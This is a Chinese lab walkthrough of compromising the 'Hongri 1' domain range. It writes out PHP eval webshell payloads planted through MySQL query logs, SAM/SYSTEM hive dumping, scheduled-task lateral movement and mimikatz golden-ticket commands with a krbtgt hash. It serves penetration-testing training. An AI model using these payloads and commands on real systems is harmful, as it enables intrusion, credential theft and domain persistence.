内网渗透-红日1

红日靶场1

  • 渗透测试过程
    • 外网打点
    • 突破边界
    • 内网横向
    • 权限维持
    • 最后

渗透测试过程

本文章只说明渗透测试思路和技巧,对域靶场搭建不进行赘述
web-ip外网设置为 192.168.119.130,kali和外网ip同网段

外网打点

kali扫描目标ip

  • nmap扫描目标网段
      nmap -Pn -sV 192.168.119.0/24
    在这里插入图片描述
    发现80端口和3306mysql服务器端口
  • dirsearch扫描目标
    在这里插入图片描述
      发现phpmyadmin
  • 访问phpmyadmin后通过root,root弱口令登录到phpadmin
    在这里插入图片描述

突破边界

  • 提权测试
    • mysql文件写入-该值为空无文件写入利用条件
      在这里插入图片描述

    • 数据库全局日志写入
      在这里插入图片描述

      开启全局日志set global general_log = "ON";
      设置全局日志存放位置set global general_log_file='C:/phpStudy/WWW/general.php';
      执行查询select '<?php eval($_POST["pwd"]);?>
      

      在这里插入图片描述

    • 数据库慢查询日志写入

      开启慢日志set global slow_query_log=on;
      设置日志写入路径set global slow_query_log_file='C:/phpStudy/WWW/slow.php';
      执行查询select '<?php @eval($_POST[shell]);?>' or sleep(10);
      关闭慢日志set global slow_query_log=off;
      

在这里插入图片描述

  • 上线cs
    查看webshell账户权限
    在这里插入图片描述

    上线cs
    在这里插入图片描述
    上线权限为system,故不涉及提权

内网横向

  • 被控主机信息收集
    在这里插入图片描述
    确定存在域,域名为god.org
    在这里插入图片描述
    确认win7,直接尝试抓取明文密码
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    拿到administrator密码为hognrisec@2022
  • 网段信息收集
      cs上传fscan
      最新版fscan上传之后执行扫描报错
    在这里插入图片描述
      尝试旧版fscan-成功
    在这里插入图片描述

  fscan64.exe -h 192.168.52.0/24 -o resu.txt
在这里插入图片描述
  运行结束后取回结果
在这里插入图片描述

  • 横向

    目前掌握信息内网fscan扫描结果结果中存在域控主机为server2008,另有一台是server2003,且存在ftp服务域信息域控主机名为owa,IP为192.168.52.138administrator用户明文密码
    

向域控横向-计划任务

设置转发上线监听
在这里插入图片描述
使用转发监听器生成shell beacon.exe
ipc连接
在这里插入图片描述将beacon.exe上传到web边界服务器后通过copy命令将beacon传输到域控
在这里插入图片描述
通过计划任务上线
在这里插入图片描述

上线成功-同时返回的权限也是system权限
向server2003横向
因为是2003所以采用at命令横向
在这里插入图片描述
但是执行后并没有上线,感觉可能是马的问题,故重新生成非x64的木马测试在这里插入图片描述
上线成功
在这里插入图片描述
至此已经完成横向移动的目的且权限均为system

权限维持

  • 卷影拷贝导出ntds.dit
    在这里插入图片描述
    导出密码文件
reg save hklm\sam sam.hive
reg save hklm\system system.hive

下载如下文件
在这里插入图片描述
本地解析
在这里插入图片描述
拿到域中所有用户的hash

  • 计划任务留后门

因为之前横向移动的时候使用的就是计划任务,所以在触发条件为onstart就会进行权限维持

在这里插入图片描述

  • 黄金票据
    前置信息
    1.需要伪造的管理员用户名:administrator
    2.完整的域名:god.org
    3.域sid-域控执行
    在这里插入图片描述
    域id为:S-1-5-21-2952760202-1353902439-2381784089
    4.kribtgt的ntlm hash或aes-256值
    在这里插入图片描述

     构造金票据mimikatz kerberos::golden /admin:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:admin.kiribi清空票据mimikatz kerberos::purge使用票据mimikatz kerberos::ptt admin.kiribi注入内存mimikatz kerberos::tgt
    

    在这里插入图片描述
    配合psexec上线
    shell psexec.exe \owa -s c:\beacon.exe

    最后

     至此整个靶场基本通关了,当然了通关的方式有很多种每个人的思路都是不同的,本篇文章也是我的第一篇域渗透文章,后面会不断更新更多的域渗透靶场的渗透测试文章,也欢迎各位大佬在看过文章之后进行斧正

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1542560.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

三菱FX5UPLC-MODBUS/TCP通信

1、使用FX5的MODBUS/TCP通信功能时&#xff0c;可与将FX5作为从站并通过以太网连接的各种MODBUS/TCP主站设备进行通信。 2、对应主站功能及从站功能&#xff0c;1台FX5可同时使用为主站及从站。 3、1台CPU模块中可用作MODBUS串行通信功能的通道数最多为8个连接。 4、在主站中&a…

音视频入门基础:AAC专题(9)——FFmpeg源码中计算AAC裸流每个packet的duration和duration_time的实现

音视频入门基础&#xff1a;AAC专题系列文章&#xff1a; 音视频入门基础&#xff1a;AAC专题&#xff08;1&#xff09;——AAC官方文档下载 音视频入门基础&#xff1a;AAC专题&#xff08;2&#xff09;——使用FFmpeg命令生成AAC裸流文件 音视频入门基础&#xff1a;AAC…

sqli-lab靶场学习(三)——Less8-10(盲注、时间盲注)

Less8 第八关依然是先看一般状态 http://localhost/sqli-labs/Less-8/?id1 然后用单引号闭合&#xff1a; http://localhost/sqli-labs/Less-8/?id1 这关的问题在于报错是不显示&#xff0c;那没办法通过上篇文章的updatexml大法处理。对于这种情况&#xff0c;需要用“盲…

皮科医生对网红药膏的说明

维A酸乳膏 阿达帕林凝胶 (粉刺 黑头 炎症性痘痘 痘印) 局部点涂 维A酸乳膏(0.01%) 0.1% 晚上使用 点涂 不能见光 做好防晒 过氧化苯酰 灭杀痤疮杆菌 发炎痘痘 效果好 先局部点涂试用 抗生素 红霉素眼膏 浓度低 结膜炎 治疗痘痘 痤疮对红霉素 耐药性强 夫西地酸软膏 脓疱性 丘…

基于单片机的无线宠物自动喂食系统设计

本设计研究了一种无线宠物自动喂食器&#xff0c;其功能是先将宠物饲料放入其中&#xff0c;通过设定喂食时间点&#xff0c;当到达这一时间点后&#xff0c;系统开始播报语音同时控制步进电机转动&#xff0c;自动进行喂食。本设计主要研究怎么设定时间并进行投喂&#xff0c;…

java项目之常规应急物资管理系统(源码+文档)

风定落花生&#xff0c;歌声逐流水&#xff0c;大家好我是风歌&#xff0c;混迹在java圈的辛苦码农。今天要和大家聊的是一款基于springboot的常规应急物资管理系统。项目源码以及部署相关请联系风歌&#xff0c;文末附上联系信息。 项目简介&#xff1a; 基于SpringBootVue的…

2024年 5 个优秀的Flutter图标库

2024年 5 个优秀的Flutter图标库 视频 https://youtu.be/jJV_1WUBXB8 https://www.bilibili.com/video/BV1Fw4m1k7A4/ 前言 原文 top-5-flutter-icon-libraries-202 best flutter icon library 作为Flutter开发者,您一定需要优质的图标资源来美化应用程序。 虽然官方提供了…

经典报童问题的2类扩展实例:带广告的报童问题和多产品报童问题

文章目录 1 引言2 经典报童问题3 带广告的报童问题3.1 论文解读3.2 样本均值近似方法 4 多产品报童问题4.1 论文解读4.2 算法模型4.3 简单实例求解4.4 复杂实例求解 5 总结6 相关阅读 1 引言 中秋已过&#xff0c;国庆未至&#xff0c;趁着这个空窗期&#xff0c;学点新知识&a…

二分查找算法(2) _在排序数组中查找元素的第一个和最后一个_模板

个人主页&#xff1a;C忠实粉丝 欢迎 点赞&#x1f44d; 收藏✨ 留言✉ 加关注&#x1f493;本文由 C忠实粉丝 原创 二分查找算法(2) _在排序数组中查找元素的第一个和最后一个_模板 收录于专栏【经典算法练习】 本专栏旨在分享学习算法的一点学习笔记&#xff0c;欢迎大家在评…

NLP-transformer学习:(7)evaluate实践

NLP-transformer学习&#xff1a;&#xff08;7&#xff09;evaluate 使用方法 打好基础&#xff0c;为了后面学习走得更远。 本章节是单独的 NLP-transformer学习 章节&#xff0c;主要实践了evaluate。同时&#xff0c;最近将学习代码传到&#xff1a;https://github.com/Mex…

【Linux篇】网络编程基础(笔记)

目录 一、服务器模型 1. C/S 模型 2. P2P模型 二、服务器编程框架 1. I/O处理单元 2. 逻辑单元 3. 网络存储单元 4. 请求队列 三、网络编程基础API 1. socket 地址处理 API &#xff08;1&#xff09;主机字节序和网络字节序 &#xff08;2&#xff09;通用socket地…

【计网】从零开始掌握序列化 --- JSON实现协议 + 设计 传输\会话\应用 三层结构

唯有梦想才配让你不安&#xff0c; 唯有行动才能解除你的不安。 --- 卢思浩 --- 从零开始掌握序列化 1 知识回顾2 序列化与编写协议2.1 使用Json进行序列化2.2 编写协议 3 封装IOService4 应用层 --- 网络计算器5 总结 1 知识回顾 上一篇文章我们讲解了协议的本质是双方能够…

4--SpringBoot项目中分类管理

目录 新增分类 分类分页查询 启用禁用分类 根据类型查询 修改分类 本文介绍SpringBoot项目中的分类管理&#xff0c;操作类似员工管理模块&#xff0c;具体详解可见以下博客&#xff0c;此处给出各部分代码 2--SpringBoot项目中员工管理 详解&#xff08;一&#xff09;-C…

基尔霍夫衍射理论

一、矢量理论到标量理论 前提条件:介质同时具有线性、各向同性、均匀性且无色散。 结论:电场和磁场的所有分量的行为完全相同,可由单一的一个标量波动方程描述,标量理论可以完全准确的代替矢量理论。 若介质不具备上述前提,则用标量理论来表征矢 量理论就会引入误差。 …

面试题 02.07. 链表相交 双指针

面试题 02.07. 链表相交 已解答 简单 相关标签 相关企业 提示 给你两个单链表的头节点 headA 和 headB &#xff0c;请你找出并返回两个单链表相交的起始节点。如果两个链表没有交点&#xff0c;返回 null 。 图示两个链表在节点 c1 开始相交&#xff1a; 题目数据 保证…

数业智能心大陆:职场倦怠的新解法

什么是职业倦怠&#xff1f; 在职场中&#xff0c;职业倦怠的表现形式丰富多样。从数业智能心大陆 AI 心理咨询平台的数据来看&#xff0c;职业倦怠呈现出多种状态。教师可能对教学不再满怀热情&#xff0c;精心备课也成为过去式&#xff1b;情绪上容易烦躁、易怒&#xff0c;在…

Elasticsearch不停机切换(上云)方案

如何给飞行中的飞机换引擎? 背景 业务背景 略 技术背景 线下集群40个索引左右&#xff0c;总数据量不大,不到100G因为ES承担的业务鉴权业务&#xff0c;所以不能接受停机割接 还有就是ES中数据来自各个业务方&#xff0c;推送的时机不定&#xff0c;也没有完备的重推机制&…

心理辅导系统的现代化:Spring Boot解决方案

1绪 论 1.1研究背景 随着计算机和网络技术的不断发展&#xff0c;计算机网络已经逐渐深入人们的生活&#xff0c;网络已经能够覆盖我们生活的每一个角落&#xff0c;给用户的网上交流和学习提供了巨大的方便。 当今社会处在一个高速发展的信息时代&#xff0c;计算机网络的发展…

MySQL --数据类型

文章目录 1.数据类型分类2.数值类型2.1 tinyint类型2.2 bit类型2.3小数类型2.31float2.32decimal 3.字符串类型3.1 char3.2varchar3.3 char和varchar比较 4.日期和时间类型5.enum和set 1.数据类型分类 2.数值类型 2.1 tinyint类型 数值越界测试&#xff1a; create table tt1…

Python画笔案例-056 绘制正方形金字塔

1、绘制正方形金字塔 通过 python 的turtle 库绘制 正方形金字塔,如下图: 2、实现代码 绘制正方形金字塔,以下为实现代码: """正方形金字塔.py """ import turtledef draw_square(length):for _ in